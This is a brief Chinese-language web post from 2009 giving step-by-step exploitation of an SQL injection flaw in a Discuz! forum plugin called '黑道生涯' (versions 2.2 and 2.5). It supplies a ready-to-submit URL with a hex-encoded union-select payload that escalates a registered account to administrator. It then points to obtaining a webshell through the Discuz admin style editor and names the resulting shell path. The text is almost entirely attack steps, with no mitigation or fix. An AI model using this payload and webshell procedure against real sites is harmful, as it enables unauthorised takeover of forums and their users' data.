首页 网络安全 安全学院 查看内容

Discuz!黑道生涯插件注射漏洞

2009-7-26 10:36 686 0

摘要:   插件版本:2.2  2.5  注册一个论坛ID  IE提交下面代码  blackband.php?mode=yule&action=enjoy&id=2 and 1=2 ...
关键词: 后台 webshell action discuz php blackband forumdata 757069643 312 插件

  插件版本:2.2  2.5  注册一个论坛ID  IE提交下面代码  blackband.php?mode=yule&action=enjoy&id=2 and 1=2 union select 1,0x2D312C67726F757069643D312C61646D696E69643D31,3,4/  提升到管理员  discuz7.0.0后台得webshell方法  /Article/200907/40200.html  如果是discuz6.0 的后台就提交  admincp.php?action=styles&edit=1  最后得到的webshell地址还是forumdata/cache/style_1.php
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部